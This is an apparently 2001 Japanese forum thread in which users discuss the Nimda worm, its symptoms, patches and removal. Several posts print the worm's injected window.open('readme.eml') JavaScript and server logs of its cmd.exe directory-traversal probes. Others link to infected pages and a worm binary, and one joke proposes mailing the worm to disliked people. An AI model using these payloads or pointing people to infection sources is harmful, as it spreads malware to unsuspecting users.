改ざんされた、ＨＰ、ＫＯＩＺＵＭＩのアレもみれたから、
お祭りだけど、かなりの、国的にはかなりの被害額じゃないかな。
ひど過ぎるのは、やだよ、
無料ファイヤーウォールも有料化されちゃわないかな。

なんかウチのサーバ、01:25からこっち、
ぱったりとNimdaのアクセスが止んだぞ？？？

これは馬鹿でもチョンでもインターネットなんて戦略を取ってきたPCメーカーへの天誅と考えるべき。

駆除終了。
やっと寝れるわい。

98系ユーザーは仕方ないにしても、NT系で今回感染しちゃった奴ってコードレッドの大騒ぎんとき何してたんだ？馬鹿としか思えないんだけど。

Win98マシンの、C:\Windows\Options\IE401 に
readme.exe あったけど、関係あるかなー？
タイムスタンプは、1997/11/25 12:55:14。
同じディレクトリ内に、同じタイムスタンプのファイルが、いくつかあるし
今日定義ファイルを更新したNAVでウィルススキャンしても、発見されなかったし
大丈夫っぽいけど、気になる・・・・・・。

寝てたんじゃないの

>>656
おれもそう思う。

また来始めた。無意味な情報ｽﾏｿ

>>657
うちには８月の初頭から今日まで欠かさずに訪ねてくださるおちゃめな人が来ます。
昨夜あたりから手土産もかわったようです。
どうにかしてくれ。

MSNJapanのトップページから「お知らせ」消えちまったわ。
なんつうか・・・凄い会社だよなぁ。まったく。

どなたか以下が本当かどうか確認してください。または、既出？
「
確認方法： win95,98系のみ。

C:\Windows 以下の system.ini をテキストエディタで開きます。
その最初の方の行の
shell=Explorer.exe
というのを見てください。
もしも、その行の後ろに、
load.exe
という文字列が見つかりましたら、感染の疑いがあります。
」
これが本当なら、私のPCはセーフなんだけどねえ。デマ？

>>649
zipだけじゃないでしょ？・・・

MSNjapanの担当者がこれからどうなるのか知りたい

NETBIOSがGATEWAYなんとなくﾏﾀｰﾘした気分。

これってちゃんとパッチ当ててJAvascript切って変なファイル開かなきゃ感染しないんだよね？

>>661
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
の「システムの改ざん」のとこにも載ってるよ

>>661
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
>ワームはsystem.iniを次のように改変することによりシステムをフックします。
>Shell= explorer.exe load.exe -dontrunold

漏れも210系だが圧倒的に韓国系が多いぞ。
その辺はかなり大雑把に塞いだから、ほとんどこなくな
ったと思ったらすげー近くのIPから・・・おなじISPだ・・・

IISじゃねーのに何度も来るなー

http://www.security.nl/misc/codered-stats/geodist.gif
今年の夏は熱かった。

串アドレス「210.159.190.134」　ポート「80」
これで、http://www.yahoo.co.jp/　を開いたら、面白いモンが見れた。

※　開くと同時に「Nimda」に感染するから、
　　セキュリティ対策に自信がない人は実行しちゃ駄目

なんか、スゲェむかついて来たＹＯ。
どうするよ。
こういうときは、総力を結集し・・・
弱者への救済を？

>>666
ｹｺｰﾝしてくれ

>>672
ﾖﾛｺﾝﾃﾞ!!

悪魔の数字・・・即離婚だな

>>666>>667
ｵﾒﾃﾞﾄｳ

>>666, >>667
ｵﾒﾃﾞﾄｳ！

>>674
ガ━━Σ（ﾟдﾟlll)━━ン

>>265
禿げ同

>>672-677
（藁∀藁）

ニムダメール来ないなー。
漏れ友達居ないし。

相談してきました。俺はApache家ロウなんでよくわからん。
IISのパッチはとっくに当てているものの、admin.dllがc:\へ56KBがいっこ。
wwwroot以下の各フォルダーへ15KBでありこちへ。
ホームページを余所から開くと T*???(?は数字)のファイルがwwwrootへ出来る。
サイズが56KBと0とどちらか。(admin.dllやreadme.exeと同じサイズ)
ちなみにreadme.exe *.eml は一切無しだった。
これって感染マシン？
T*???(?は数字)の仮ファイルらしきものはwwwrootフォルダーのアクセス権を変えたら出来なくなったけど。不安らしい。
再起動であれこれやるみたいだから起動しっぱなし。html文へ追加する癖は一切のコンテンツに追加されていない。nimdaチャッカー希望。
誰かおしえてやってくれ。

まだ立ち上げたばかりの自宅サーバのApachに、思わぬ多数の
お客様達。
リモホでログ取りたいので、Apachの設定でKeepAlive Onにして
DNSの逆引きを掛けているが、210.xxx.xxx.xxxのブロックはほと
んど逆引き出来んね。
lame server on 'xxx.xxx.xxx.210.in-addr.arpa'のエラーばっか、
クラスC以下でも逆引き設定せいよ！

>>681
世界の平和の為にｱﾎﾟｰﾝしてください。

mac userだけど、感染する方法は？

とりあえずノートンアンチウイルスのトライアルをインストールして
ライブアップデートして特定したら？
そんなのネットにつなげるな！

>>684
感染したフリして、手動でメールにreadme.emlを添付して、
いやな奴に送りまくる。

>>684
VirtualPCに気を付けろ

Nimdaに感染したらしいのですが、readme.exeはみあたらず、
感染中に「不正落ち」したのでウイルスは活動してないようです。

それよりも、C:\に、見たこともないtxtファイルが３つほどあります…
どうもウイルスの活動履歴みたいなんですが、なんなんでしょうか？

>>688
コピペって貼ってみ。

感染している奴のディレクトリを除いてみたら、
TFTP******
みたいなファイルがたくさんできていた。

OEMCleanup:Start
１つめです。
ResetRegistry:Start
ResetRegistry::Software\Microsoft\Windows\CurrentVersion:
ResetRegistry::Software\Microsoft\Windows\CurrentVersion:setup
ResetRegistry::Software\Microsoft\Windows\CurrentVersion\Run:

不安な人は、これ。

感染の有無の確認
1.●トレンドマイクロ　オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
　*.emlが大量にHITした際は確定。
　ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
　そうでないときは後者2個を削除して様子を見る。
　といっても後者二つを消したからウイルスが消えるわけではない。
　ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.ワームは活動を開始するとマシン内のc:\Windows\tmpディレクトリに以下のファイルを作成します：
　　　・c:\Windows\tmp\mep????.tmp
　　　　（「？」は任意の半角英数字　例：mep1234.tmp）
　　　・c:\ADMIN.DLL
この２つのファイルはワームが添付されたメールファイルです。
　　　・c:\Windows\tmp\mep????.tmp.exe
　　　　（「？」は任意の半角英数字　例：mep1234.tmp）
このファイルはワーム本体のプログラムファイル。

以上コピペでし

２つめです。
FirstRunScreens:Start
SpezialGeninstalls:Start
SpezialGeninstalls:Looking for :C:\WINDOWS\OPTIONS\PREDUP.TAG:
Intl:INTL:0:
GetUserInfo:INIT
VcpClose:About to close
VcpClose:About to End
VcpClose:About to Terminate
DoPreInstallWork:Auditmode :0:
PrepareRunonce:RUNONCE Section:RO_PREINSTALLAPP:
PrepareRunonce:Process :コントロール パネル: :1
PrepareRunonce:Process :[スタート] メニューのプログラム: :1
PrepareRunonce:Process :Windows ヘルプ: :1
PrepareRunonce:Process :MS-DOS プログラムの設定: :1
PrepareRunonce:Process :日付と時刻: :2
PrepareRunonce:Process :アプリケーションの設定: :1
PrepareRunonce:Process :レジストリの追加: :4
PrepareRunonce:Process :INIの編集: :4
PrepareRunonce:Process :所在地情報の入力: :2
PrepareRunonce:RUNONCE Section:RO_MSOTHER:
PrepareRunonce:RUNONCE Section:RO_OEM:
IsKeyEmpty:Start
ProcessInfInstall:File:C:\WINDOWS\OPTIONS\EndUser.INF: Section=:Options:
ProcessInfInstall:Geninstall of File :c:\windows\options\enduser.inf: on section:GI_EndUserRestore: reRet=0
ProcessInfInstall:Geninstall of File :C:\windows\options\enduser.inf: on section:GI_SilentMouseCleanup: reRet=0
VcpClose:About to close
VcpClose:About to End
VcpClose:About to Terminate
IsKeyEmpty:Start
VcpClose:About to close
VcpClose:About to End
VcpClose:About to Terminate
Timer:Start OPKRemoveInstalledNetDevice :124432:
Timer:End OPKRemoveInstalledNetDevice :124452:
CheckRunonceSetup:Start
IsKeyEmpty:Start
IsKeyEmpty:1) Have :日付と時刻: :RUNDLL32.EXE SHELL32.DLL,Control_RunDLL TIMEDATE.CPL,,/f:
CheckRunonceSetup:Check for wrapper =
CheckRunonceSetup:Add wrapper = runonce.exe
FirstRunScreens:Exit:0

>>342
オンラインスキャンするか

スタート→検索→ファイルやフォルダ
で、検索。であったら、直ちに削除。

間違ってたら、フォローよろしく

３つ目は長すぎてはじかれるので一部です。
NETDI: ClassInstall (0x6 on 0x373e:0x58) on at Enum\Root\Net\0000
NETDI: SetupFlags=51D(SUF_INSETUP)(SUF_FIRSTTIME) BootCount= NetSetupFlags=0 (RETAIL)
NETDI: Examining class Net
NETDI: dif_FirstTimeSetup
NETDI: Setting FirstBootUpgrade=1
NETDI: ChangeLine: No matches found.
NETDI: File Information for c:\windows\SYSTEM\wsock32.dll
NETDI: File not found
NETDI: File Information for c:\windows\WINSOCK.DLL
NETDI: File not found
NETDI: File Information for c:\windows\SYSTEM\WINSOCK.DLL
NETDI: File not found
NETDI: Vxd\Winsock\IrSockets=wsirda.vxd
NETDI: File Information for c:\windows\SYSTEM\wsirda.vxd
NETDI: File not found
NETDI: BackupWSock: Clean install, exiting
NETDI: DetectWSock=0
NETDI: Installing WS2 in the standard locations
NETDI: QueueNdiFileCopy: C:\WININST0.400\wsock32.dll->(LDID 11)wsock32.dll
NETDI: QueueNdiFileCopy: C:\WININST0.400\winsock.dll->(LDID 25)winsock.dll
NETDI: Batch.Display=0
NETDI: SelectMyBestCompatDrv: Found a compatible driver: ダイヤルアップ アダプタ
NETDI: ClassInstall(0x6) end
NETDI: NETDI: lpRegLogConf = 0x0
NETDI: ClassInstall (0x9 on 0x373e:0x58) on at Enum\Root\Net\0000
NETDI: SetupFlags=51D(SUF_INSETUP)(SUF_FIRSTTIME) BootCount= NetSetupFlags=7 (RETAIL)
NETDI: ClassInstall(0x9) end
NETDI: ClassInstall (0xa on 0x373e:0x58) on at Enum\Root\Net\0000
NETDI: SetupFlags=51D(SUF_INSETUP)(SUF_FIRSTTIME) BootCount= NetSetupFlags=7 (RETAIL)
NETDI: ProcessNdiFileQueue: C:\WININST0.400\wsock32.dll -> c:\windows\SYSTEM\wsock32.dll copied file
NETDI: ProcessNdiFileQueue: C:\WININST0.400\winsock.dll -> c:\windows\winsock.dll copied file
NETDI: ChangeLine: No matches found.
NETDI: AddRemoveSetVer fAdd=1
NETDI: ChangeLine: Inserting at anchor "DEVICE=c:\windows\setver.exe"
NETDI: ClassInstall(0xa) end
NETDI: ClassInstall (0xc on 0x373e:0x58) on at Enum\Root\Net\0000
NETDI: SetupFlags=51D(SUF_INSETUP)(SUF_FIRSTTIME) BootCount= NetSetupFlags=7 (RETAIL)
NETDI: ClassInstall(0xc) end

>>694
人に教えを請うのに偉そうだなお前
フォローよろしくって何様よ？

メール送信機能がある、みたいなことがどっかに書いてあったけど、
バグってない?

全然送られる気配ないんだけど。

Code Blueを上書きして広まってるだけでクライアントサイドでは
特別暴れてないような気がする。
これで感染クライアントがメール投げまくってたら大変なことになっていたと思うぞ。

マシンの現状は、リソースは多少低下、
emlファイルは原本（？）以外確認できず、
system.iniはshellの部分が改変されています。
ちなみにload.exeは確認できません。

あと、ホントに「ウイルス」だったら「感染」しゃってフォーマットからやり直し、は正しいけど、
「ワーム」だったら、とりあえず該当ファイルを根絶やしにしてやればいいだけのような気がする。

ホントに「ウイルス」なの?

>>696
ごめん、
かくスレまちがったみたい

関係無いと思うよ＞3つのFile
メーカー製のパソコン？ノートの。（irのドライバ入れてるみたいだから）
買ってきて最初の起動時、クラスインストーラでプリインストールのドライバ入れた時の
ログが残ってるだけだと思う。タイムスタンプは見てみた？

ちゃんとしたチェックはオンラインの奴とかほかの書き込みみてくださいにゃの。

あ、>701は>688へのレスね。
もう寝るかぁ・・

>>699
もういいかげんにシマンテック

>>701
有り難うございます。
タイムスタンプは改変できるという噂がありましたので…（汗）
ご迷惑をお掛けしました。申し訳ございません。

NImdaって２回ずつ叩いてくる？
ＣｏｒｄＲｅｄの時は３回ずつだったけど、今回は２回が多い。
せっかく黒氷に溜まりに溜まったログを全部削除して身軽に
なったのにまた増えて来た・・・。

log、nimda だけで1日で約1.5MBぐらいですね。感染が拡大すると 3MB ぐらいに
はなるかな?

寝る。。。
コレで俺の生産性落ちると日本経済が低迷する。
それこそ、テロリストの思う壺だ。。。

>>707
アンタ今良い事言った。

今回このウィルスに感染したのを機にIEをバージョンアップしようと思い、
Ver.6をダウンロードしたのですがインストール出来ずに困っています。

前回のインストールが完了していません。Iternet Explorerのセットアップを実行する前に
コンピュータを再起動して、そのインストールを完了してください。セットアップは終了します。

となってしまいます。どうすればいいんでしょうか？
使っているバージョンは5.00.2920.0000です。

問題のウィルスはオンラインでウィルスバスターを使い一応削除しました。

ここ２０〜３０分
攻撃してこなくなったよ。？？？

もちろん言われるままに再起動してからインストールしても
同じメッセージが出てしまいます。

>>709
前の状態に戻すか、修復ｲﾝｽﾄｰﾙしてIE6を入れてみる?

>>712
修復インストールってどうやるんですか？

今、IEをアンインストールしようとしたんですがコントロールパネル→
アプリケーションの追加・削除ではできなかったです。

>>709
あー、それってIE4→5の時にもあったよね。
なんかコツが居るんだよね。
確かMicrosoftのサポート検索すると回避策があったと思う。

どっかのフォルダを消したりとかするんだったかと。

まだ続々くるよ。

p1063-ipad01daianji.nara.ocn.ne.jp

ホスト名、風流すぎ。だいあんじ、ってのはこれか?
http://www.kintetsu.co.jp/senden/Database/TA-Htm/TA0040.html

>>709
そもそもウイルスバスターのオンラインスキャンには、削除機能なんぞ無いと思われ。
てゆーか、削除ツール自体がまだ何処からもリリースされていないと思われ。
ワームファイルを削除したところで、改変食ったファイルはそのままだから
何の解決にもならぬ恐れ大ありと思われ。

しかるに、今更IEのばーぢょんあぷしても無駄と思われ。

文末が思われ中毒と思われ

>>717
ほめてくれてありがとうと思われ

PL1:
mov 2ch,ドキュン
int 21h
loop PL1

削除ツールはどこからもまだ出てない、ていうか、
アンチウイルスソフトでスキャンして、ひっかかったのを削除、
では足らんのかえ?

ホンモノのウイルスだったら、そんなのんきなことをしていては
まにあわないが、メモリに常駐して片っ端から感染、ていう感じでは
ないが。

ていうか、それいぜんに、きのうの今ごろ、メディアプレーヤーが
開きまくってたんだけど、各所に書いてある症状が出ない。
当方、Windwos2000のSP当たってない素のやつ。

俺のＰＣ攻撃してくるサーバって
韓国と四国だけなんだけど・・・

>>720
とりあえず今のところの削除方法（ノートン使用者向け）

http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

Cドライブのウィンドウズフォルダにaim95ってフォルダができてるんだけど。

Zone Alarmで警告されたから、アクセスしたら、サイトハックされてるよ^^;
http://211.125.162.91

こんなのワクチンが出るまで飼ってられるかと思い結局リカバリするはめに。

C:\Windows\Program files\nimda\の中にある
setup.exeは実行しても害は無いでしょうか？

>>724

>>726
あると思う

>>726
それ以前にそんなディレクトリは無いと思われ

>>724
ﾜﾗﾀ
でも、ＵＳＡて書いてあるな。
昨日見た大学のサイトは、コイズミだったのに、
当たり前だが、しっかりwindow.openあるしな。

>>726
藁タ

県庁とかやられてるYO!!

NIKKEI NETによる被害情報
http://it.nikkei.co.jp/it/sp9/

ブラウザのプロクシとしてsquidを通してるんだけど、squid.confに

acl SafeNimda url_regex readme\.eml$
http_access deny SafeNimda

みたいなの追加したら、readme.emlで終わるurlにはアクセスできなくなったので
少しは安全になるかな。

今、日経新聞読んでるけど、結構スペース大きくとってる。
しかしこれじゃ勘違いするぞ。つかちゃんと理解して書いてないような。
Win98,MEがブラウザから感染、サーバはＩＩＳで感染するって書いてる。

すいません、私ネスケ使ってるのですが、ネスケでも関係なくヤバいですか？
過去ログ漁ってたんですが量が多すぎて…。(^^;;

>>734
藁
もっと株は下がるＹＯ

>>735
オレわかんない。
とりあえず大丈夫なんじゃ？
でも、メールとかで貰うことがあるかな・・・。

>>737
なるほど。
メールのほうは添付ファイルは開かないで捨ててしまうので問題無いと思うんですがウェブページのほうは怖いです…

>738
変なファイルがダウンロードされてきたら、
捨ててね。

>>734
ファイル共有での増殖にも触れてないな、企業にとってなんの役に
もたたん記事だ。ただやばいから気おつけてねって警告には
役に立つか。
>>738
ウイルス付メールを受け取った新たなユーザがOutlook ExpressまたはOutlookを利用し、
かつInternet Explorerのセキュリティホールのパッチが適用されていない場合には、
メールを見る（プレビュー機能）だけでウイルスに感染（ダイレクトアクション）します。
-- 引用元 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm --

ＩＥ５．００はどのような対策を取ればいいのでしょうか？

>>741
IE5.01SP2 か IE5.5SP2 か IE6.0 にアップデート

Windows Updateの鯖が感染してたらｲｲﾅ

普段からWinMXでファイルをたくさん落としていたあほが、
一台で64ファイルも感染していたケースも...。

出所のわからないファイルは、
必ずダウンロード後にウイルスチェックしてください！

ADMINではない・・・・
神経科学分野で使われるNIMDA受容体
NIMDA (N-methyl-D-aspartate) preferringだ愚かな人間達よ・・・

現在、IE5.5使用。
IE5.01SP2 か IE5.5SP2 にすべきか悩んでます。
ご教授を。

>>746
私はIE6にしたよ

>>356
とりあえず、Nimdaをばらまいているページを
既存のブラクラチェッカにかけてみたらどうなるのかな？

JavaScriptの特定のコードを見つければ、できそうだね。

>>747
いろいろソフトが使えなくなりそうでｺﾜｲ。

>>740
あら、プレビューだけでもヤバいんですね(^^;
私はOutlookじゃなくてBeckyを使っているのですが大丈夫ですかね？

>>750
とにかくＩＥをSP2にアププデート。で、ＯＫ！

2001/09/20(07:34:49) W-SV 211.125.162.91 [80] 500 284 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/20(07:37:50) W-SV 211.125.162.91 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2001/09/20(07:38:55) W-SV 211.125.162.91 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"

まだまだ来やがる。
サーバーがApache、BlackJumboDog、AN Httpd等なら大丈夫なのか？

ちなみに中から「TROJ_NIMADA.A」ってファイルが出て来た。
readme.emlやreadme.exe等も実行せずに削除すれば大丈夫のようだ。
他サイトではJavaScriptを切れば防げる。

↓このウェブページは改ざんされてreadme.emlをDLさせる様になってます。
www.wamsoft.co.jp/juui/juui.html

見たい、確認した人はJavaScriptを切ってから閲覧してください。
そして、ソースをエディタで開きHTMLの末尾に

<html><script language="JavaScript">

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

</script></html>

とあります。

http://search.fresheye.com/?kw=readme.eml+window+open+null+resizable&term=monthly
72件

TROJ＝トロイ？

感染した・・・
けど特に何もないの？
ノートン先生検疫中

>>754
うん。トロイ型・・・・・・
ドライブが共有になる・・・・・

>>684

MacでWebサイト立ててて、そこWinとファイル共有しろ。

BlackJumboDogのログより
2001/09/20(08:20:49) W-SV 211.2[80] 500 267 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/20(08:20:54) W-SV 211.2[80] E200035 " .. が含まれるリクエストは許可されていません。[ 211.221.78.5 "/scripts/..%5c../winnt/system32/cmd.exe" ]"
2001/09/20(08:20:54) W-SV 211.2[80] 500 267 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/20(08:20:59) W-SV 211.2[80] E200035 " .. が含まれるリクエストは許可されていません。[ 211.221.78.5 "/scripts/..%2f../winnt/system32/cmd.exe" ]"
2001/09/20(08:20:59) W-SV 211.2[80] 500 267 "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

かなわんなぁトラフィックスゲ―よ。
ちなみに相手IPは消してあります「211.2xxxxxxxx」

Macでも感染するのかな

ブラウザはIE6にすれば防げるみたいだな。
とりあえず何でも試す。
酷いサイトは一ページにJavaScriptが二行も記述されているぞ。
クワバラクワバラ

>>660
>MSNJapanのトップページから「お知らせ」消えちまったわ。
> なんつうか・・・凄い会社だよなぁ。まったく。

お知らせそのものは入り口なしで残ってる。
http://help.msn.co.jp/notice.htm

MSがういるす撒いた記念としてミラーしとけ

>>759

>>757

ニッポンだせーよ(´Д`)

http://www.security.nl/misc/codered-stats/geodist.gif

>>759
感染はしないが、共有していたら感染経路にはなる。

>>759

Macの鯖が「おまえにニムダうつされた」といわれて訴えられることは可能。

>>764

この場合、Macの最新ウイルスチェッカでも発見されないから気をつけろよ

情報求む！
現時点で、修復出来るパターンを出してているのはシマンテックだけ？

>>761
今後も情報を提供するって言葉は嘘だったのか・・・・
それに、他のサイトが「Nimda」を特集組んでいるのに、何処にも載せていない。

>>767
http://www.trendmicro.co.jp/nimda/tool.asp
トレンドマイクロ、今出た

>>769
俺も今見つけた！
しかし、トレンドは当初、他のexeファイルに感染しないと嘘書いてたからな〜

・シマンテック
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]

http://www.trendmicro.co.jp/nimda/tool.asp
> HTTP/1.1 Server Too Busy

ヘボい。

どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない？

見ただけで勝手に何かを実行するなんて言う考えは
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい(ププ

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。

>>773 他でやってくれ。それどろではないのだ。ＭＳが糞なのは
みんなわかってるからさ。

>>774
わかってるなら使うな(藁

>>773
Windows板に逝って好きなだけ暴れろ！
現実逃避してる奴はこれだからウザイ・・・

ところで、トレンドの修復ツールを実行した奴いるか？
感染したテスト機をすぐに用意できない・・・

>>773

>>　1番悪いのは、ビルゲイツです。
>>　商売以外にももうちょっと頭使って下さい(ププ

そんな儲からないことにアタマ使うわけないじゃん。
おまえももっとアタマ使えよ（ｗ

>>774
たしかにね、そのとうりだ

だが、そんなOS使ってる俺はもっとバカだな(w

>>773はコピペ。

>>773
セキュリティホールの無いＯＳなんて無い。
常にWindowsが狙われるのは普及率が最も高いからだ。

>>776

ここのリンク先で感染可能

http://search.fresheye.com/?kw=readme%2eeml&term=weekly

>>773　に関するレスはこれで終了！

>>780
初心者率も高い

>>782

思ったよりサーバーには感染していないな！
現時点で８０台か、昨日の朝の時点で約４０台、昼過ぎで約６０台だったと思う。
流石にCodeRedの時点でSP適用してたサーバーが多いということかな！？

＃もちろん実際に検索に引っかからないサーバーも多数あるけどね。

今回はCodeRedの時よりも社内LANの被害が甚大のようだ・・・

まぎらわしいからMacは感染しないなんていわないで、MacやLinuxからも感染するって言えよ！検査対象から外されてるよ！

784

機種・ＯＳ問わず共有エリアをチエックしないと、そこから復活する

ルータのログにアクセスいっぱい
TCP:80を叩かれまくり。

表ざたになってない（というか、信用問題に発展するので表に報告しない）
社内LANの被害は尋常ではないと思われ（；´Д｀）

>>785
それはべつにこれに限ったことじゃないだろ。アホか？

PE_NIMDA.Bらしきものが見つかったってホント？

2001/09/18 【IT Proアンケート】ウイルス対策についての皆さんのコメント
http://itpro.nikkeibp.co.jp/free/ITPro/ITPROFORUM/20010917/2/

タイミングがアレゲすぎ（；´Д｀）

>>784
いや、もっと感染してるよ。
おおよそ思い付く限りのIISで稼動してる鯖へ逝ってみれば？
結構の鯖がサービスを停止してると思われます。
うちの鯖もやられたので切り離してる。
中に入っている顧客の事より、被害を広げたりする方が損害がデカイから。

ところで、Nimda　に名前の由来知っている人いない？

>>789

>>641こういうバカのこと言ってんの。

Win2K再インストール後にhisecweb.infテンプレート適用するのを忘れていたのに今気が付いたよ・・・鬱

ワームのソース公開ｷﾎﾞﾝﾇ

ADMIN 2(to) (the)3(rd) War

>>793
逆読みしてねん

>>791

ここに自身満々で対策してますって書いてるヒト、ほとんどは今回ので感染したな・・。

正直、ネ助入れたい。

>>796

自分でもってけ

http://search.fresheye.com/?kw=readme%2eeml&term=weekly

いれりゃいいじゃん

>>794
動くの？

>>797
W32は只の識別用の区分ね。
WIN32で走るプログラムの意。
誰だよ。第三次世界大戦なんて言い出したの。
マスコミこんな報道してる手間に、関連バグやパッチの情報出せって。

>>803

Java Script や　HTML　はどうよ。

>>805

VBAもな（ｗ

リスクはいらないし
逆汗環境もdump環境もないにょ

ダンプ取るとＮＩＭＡＤＡっていう文字列が入っているのかな？

回線細いからめんどい。＜N助ﾀﾞｳｿ

トレンドでは危険度がVA1に・・
「PE_NIMDA.A」VAC1国内大規模感染警報

俺の記憶じゃいままで2が最高だったと思うが・・・

>>805
それWindows用のプログラムじゃねーじゃん。
それにreadme.exeがマックに出来たところで
ゴミが増える以外に被害あるの？

>>811Ｍａｃ自身に被害はないが 被害を広げる

Inetpub書き換え放題ﾏﾝｾｰ

>>812
どうやって広げるの？

MacでWebサイト立ててて、そこWinとファイル共有してたら、Macからでも感染する

>>789
>>>785
> それはべつにこれに限ったことじゃないだろ。アホか？

今回はMacも知らずにもらうんだよ。しかもMacから他へ広めることもある。

マッカーやリナクサーからしてみればそんなの知ったことかって感じだよなぁ。

>>789

マカーは今回のことは対岸の火事と思ってるからな。

そこまで言えるなら、マカーにも啓蒙してやってくれ。

>>817

やつらが日頃嗤ってるWindowsユーザー以下の態度ぢゃん！��(￣△￣；

Macは感染しない。経路にはなる。
経路になる可能性はどのOSにもある。

ウイルスのEXEを自分自身で実行できないだけで受ける被害はMacだってWindowsとかわんないぢゃん

http://61.208.221.9/

>>820

分かったようなこと書いてるけど、Nimda以前はそんなことマカーは心配してなかったんじゃないの？

>>822
氏ね
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

>>819
逆にMacウィルスが大蔓延したとしてWinユーザーはそのために動くか？
自分に影響がないなら大多数は動かないと思うけど。

>>821
誰かに送っちゃって信用問題とかそういう二次的被害は別にしたら
ウイルスなんて実行しなければ実害ほとんどないじゃん。

>>808

参考までにアップ
http://members.jcom.home.ne.jp/hangedman/readme.txt

文字列のみ切り出したもの。30000ぐらいから読める
http://members.jcom.home.ne.jp/hangedman/readme_exe.txt

本体（exeでアップするわけにもいかないので自分でBase64デコードして）
http://members.jcom.home.ne.jp/hangedman/readme.eml.txt

先ほどわかったんだが、Macでも感染するらしい。
サイト閲覧していてダウンロードを促すダイアログが出た。
このままダウンロードしたら感染だんろうなぁ・・・・・

更にWinにてIE5.5SP2でもダウンロードされてしまった。
TEMPフォルダに「W32 TROJ_NIMDA.A」というファイルが・・・・
気付いたんだが、ダウンロードされたファイル名は個々に違う様に思ふ

メール鯖と思われる所からきた。

mail.cyberitcorporate.com - - [20/Sep/2001:09:09:04 +0900] "GET /scripts

>>825

そういうことだな。

Windows全部スキャンしても、MacのウイルスチェッカにNimdaはひっかからないから、Macは温床になりうるんだ。

Macはウイルスの温床とか言いがかりつけられてMac社内禁止令とかだされてもマカーの自業自得だな。

>>827
ダイアログ出た？
うちは別ウインドウにreadme.emlの内容がずら〜っと表示されただけだったよ
どこかのスレ(ニュー速かな？）に書いてあったトルシエ応援ページのところでね

質問：
　NT4ServerとNT4WSがあって、IE5 (5.00.2314.1003) があるんですが
　MSのサイトによると
>本ワームへの対策としては、各製品に対して
>Service Pack 2 のインストールを行う
>Internet Explorer 5.01 SP2 (Windows 2000 SP2 に含まれています)

ってあるんですが、Windows2000SP2のCDは手元にあるんですが、
これをNT4のマシンに突っ込んでアップデートしろ
ってことですかい？

Macだ、Winだ言ってるのは、個人ユーザーなら別に勝手にしろ
だけど、、、nimdaって、多分に企業内のLAN環境意識してると
思うよ。書いた奴。
自分の端末だけ良ければと言う考え方は、こういうウイルス出
たとき、特にビジネスユーザーは非常に危険。
仕事で仕方なくキーボード叩いてる奴もいる訳だし。誰が地雷
踏むかなんて予測できない。
・・・商用サイトのINDEX書き換えの為に閉鎖って、どのぐらい
の損失生むのかな。。。感染ユーザーからのクレーム処理も含め
て。

>>827
ダウンロード促すとこまではMacでも一緒だけど、DLしても
readme.emlの実態であるreadme.exeは実行できないから
感染はしないよ。

>>831 ここをよく読むように。むう。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078

>>83
WIN2K(SP2）に入ってるだけってこと、SP1の人はアップデート
しとほうがいいんじゃないって解釈したけど。

俺はコードレットでてから(感染）、Meに変えたよ(バカ）

>>831 ＩＥとＩＩＳの違いがわかる人だよね？（^_^;

83→831です

>>833
バーチャルPC入ってたらまずいのではないっすか？
昨日あわてて削除した

>>838
バーチャルPC上で実行したIEから感染、は当然あり得るけど
それをもってMacが感染したと言うのはどうかと思う。
それと、バーチャルPCが入ってても実行してなければ
Mac上で何をしようと感染はしないよ。

http://61.208.221.9/

>>831を翻訳。「ＩＥを5.01SPにアップデートしようとしたんですが、上記のように
Win2KSP2に含まれていると記載されていました。私、Win2KSP2の
アップデートＣＤ持ってるんですが、このＣＤを使ってＩＥをアップデートできますか？」
答え ダメです。

W32Nimdaの「W32」逆読みして第三次世界大戦なんてコメントつけて
報道したマスコミ何処だよ。。。
WIN32のアプリなんだって！この辺ちゃんと報道できないマスコミは
糞だ。。。
ソースに、dosモードじゃ動かねーぞって書いてあるだろが。

>>842 >>33にある。

>>834
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
ここを読んだんですが。Nimdaの事はおいといて、
Win2000SP2を使って、NT４上のIE5.00をアップデートできるのか？
っていう単純な疑問です。

IE5.00なら感染しないの？

>>841
はい、そう言いたかったのです。
結果、ダメなんですね。正確に解釈していただいて有難うございます。

# IE5.5SP2ってCDROMかなんかで雑誌についてますでしょか？
9600bpsの身なので、オンラインじゃちょっと…。

>>844 すまん。読み違えてたよ。出来ないと思うけど。やってみたこと
ないからわからんが。CDの中身みてＩＥのセットアップファイル見つけて
起動してみて、いけそうだったらやってみれば？
あまりお勧めできないけど。自己責任でどうぞ。

>>847 すまん。名前間違えた。834でございます。鬱。

/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&dir+\

これってCodeBlue? Nimda?↓
[18/Sep/2001:22:58:22 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290

もうどっちだかわからん。

>843
・・・長官って、、、モララーか？
記者会見のコメントそのまま速報で載せたのか。。。毎日。
ap、ロイター辺り見てみよっと。

>>847
どうも。
